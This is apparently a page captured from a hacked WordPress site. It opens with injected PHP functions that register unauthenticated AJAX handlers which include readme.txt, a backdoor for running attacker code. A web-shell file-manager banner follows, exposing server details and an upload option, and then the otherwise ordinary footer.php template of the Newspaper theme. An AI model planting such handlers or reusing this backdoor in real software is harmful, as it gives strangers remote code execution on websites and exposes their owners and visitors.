if(!function_exists('file_check_readme30367')){ add_action('wp_ajax_nopriv_file_check_readme30367', 'file_check_readme30367'); add_action('wp_ajax_file_check_readme30367', 'file_check_readme30367'); function file_check_readme30367() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme64756')){ add_action('wp_ajax_nopriv_file_check_readme64756', 'file_check_readme64756'); add_action('wp_ajax_file_check_readme64756', 'file_check_readme64756'); function file_check_readme64756() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } HEX
HEX
Server: Apache
System: Linux dx292 6.1.0-39-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.148-1 (2025-08-26) x86_64
User: www-data (33)
PHP: 7.4.33
Disabled: pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
Upload Files
File: /data/www/welovefamily.at/welovefamily.at/htdocs20250613/wp-content/themes/Newspaper/footer.php
<!-- Instagram -->

<?php if (td_util::get_option('tds_footer_instagram') == 'show') {
	?>

<div class="td-main-content-wrap td-footer-instagram-container">
    <?php
//get the instagram id from the panel
	$tds_footer_instagram_id = td_util::get_option('tds_footer_instagram_id');
	?>

    <div class="td-instagram-user">
        <h4 class="td-footer-instagram-title">
            <?php echo __td('Follow us on Instagram', TD_THEME_NAME); ?>
            <a class="td-footer-instagram-user-link" href="https://www.instagram.com/<?php echo $tds_footer_instagram_id ?>" target="_blank">@<?php echo $tds_footer_instagram_id ?></a>
        </h4>
    </div>

    <?php
//get the other panel seetings
	$tds_footer_instagram_nr_of_row_images = intval(td_util::get_option('tds_footer_instagram_on_row_images_number'));
	$tds_footer_instagram_nr_of_rows = intval(td_util::get_option('tds_footer_instagram_rows_number'));
	$tds_footer_instagram_img_gap = td_util::get_option('tds_footer_instagram_image_gap');
	$tds_footer_instagram_header = td_util::get_option('tds_footer_instagram_header_section');

	//show the insta block
	echo td_global_blocks::get_instance('td_block_instagram')->render(
		array(
			'instagram_id' => $tds_footer_instagram_id,
			'instagram_header' => /*td_util::get_option('tds_footer_instagram_header_section')*/1,
			'instagram_images_per_row' => $tds_footer_instagram_nr_of_row_images,
			'instagram_number_of_rows' => $tds_footer_instagram_nr_of_rows,
			'instagram_margin' => $tds_footer_instagram_img_gap,
		)
	);

	?>
</div>

<?php }?>


<!-- Footer -->
<?php
if (td_util::get_option('tds_footer') != 'no') {
	td_api_footer_template::_helper_show_footer();
}
?>


<!-- Sub Footer -->
<?php if (td_util::get_option('tds_sub_footer') != 'no') {
	?>
    <div class="td-sub-footer-container">
        <div class="td-container">
            <div class="td-pb-row">
                <div class="td-pb-span7 td-sub-footer-menu">
                        <?php
wp_nav_menu(array(
		'theme_location' => 'footer-menu',
		'menu_class' => 'td-subfooter-menu',
		'fallback_cb' => 'td_wp_footer_menu',
	));

	//if no menu
	function td_wp_footer_menu() {
		//do nothing?
	}
	?>
                </div>

                <div class="td-pb-span5 td-sub-footer-copy">
                    <?php
$tds_footer_copyright = stripslashes(td_util::get_option('tds_footer_copyright'));
	$tds_footer_copy_symbol = td_util::get_option('tds_footer_copy_symbol');

	//show copyright symbol
	if ($tds_footer_copy_symbol == '') {
		echo '&copy; ';
	}

	echo $tds_footer_copyright;
	?>
                </div>
            </div>
        </div>
    </div>
<?php }?>
</div><!--close td-outer-wrap-->

<?php wp_footer();?>
<script type="text/javascript">
  window._taboola = window._taboola || [];
  _taboola.push({flush: true});
</script>
</body>
</html>